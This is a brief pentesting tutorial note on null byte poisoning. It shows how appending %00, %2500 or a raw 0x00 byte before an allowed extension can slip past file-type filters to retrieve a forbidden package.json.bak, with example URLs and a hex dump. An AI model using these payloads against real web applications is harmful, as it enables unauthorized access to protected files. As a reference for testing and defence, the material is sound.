Null Byte Poisoning

It's used to bypass input filtering or validation mechanisms in web applications or other systems. It involves inserting a null byte in URL encoding (%00) or in hexadecimal (\x00) to terminate strings.

  • We requested a site to get a resource but gives us a 403 error (Forbidden access). The site tells us that only certain types or extensions are allowed to be requested

http://$url/package.json.bak

  • We can bypass the check with a null byte and add the type of extension the site allows. When making the verification it will be bypassed as it ends on an allowed extension, but internally when searching the file, the null byte will end the string allowing to get the deride file

http://$url/package.json.bak%00.$extension

  • Also, if it doesn't work this way, we can URL-encode the % which will be represented as %25

http://$url/package.json.bak%2500.$extension

  • Also is possible to get this result by modifying the hex data of the request and adding a null hex byte in the corresponding position

00000000  68 74 74 70  3A 2F 2F 24   75 72 6C 2F  70 61 63 6B   http://$url/pack
00000010  61 67 65 2E  6A 73 6F 6E   2E 62 61 6B  00 2E 24 65   age.json.bakA.$e
00000020  78 74 65 6E  73 69 6F 6E   0A                         xtension.  

In this case, we replace the A that we have put as a reference, with the 00 byte

Last updated